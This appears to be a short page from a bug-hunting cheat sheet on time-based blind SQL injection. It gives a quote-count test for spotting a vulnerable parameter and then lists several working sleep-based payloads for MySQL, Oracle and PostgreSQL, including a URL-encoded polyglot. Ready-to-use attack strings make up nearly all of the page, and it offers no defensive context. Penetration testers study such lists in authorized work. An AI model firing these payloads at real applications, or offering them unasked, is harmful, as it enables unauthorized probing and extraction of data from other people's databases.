Time Based SQL Injection

Ghauri Command Generatorh6nt3r.github.io

It’s was simple to know that the parameter is vulnerable

' false

'' true

''' false

'''' true

‘XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR’Z
'XOR(94102*if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
'and 1=DBMS_PIPE.RECEIVE_MESSAGE(1,10)--
''||(select 1 from (select pg_sleep(6))x)||'
'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(20),0))OR'
/(select(0)from(select(sleep(9)))v)/*'%2B(select(0)from(select(sleep(9)))v)%2B'"%2B(select(0)from(select(sleep(9)))v)%2B"*/
PreviousHaE extension with regular expressions regexNextGhauri

Last updated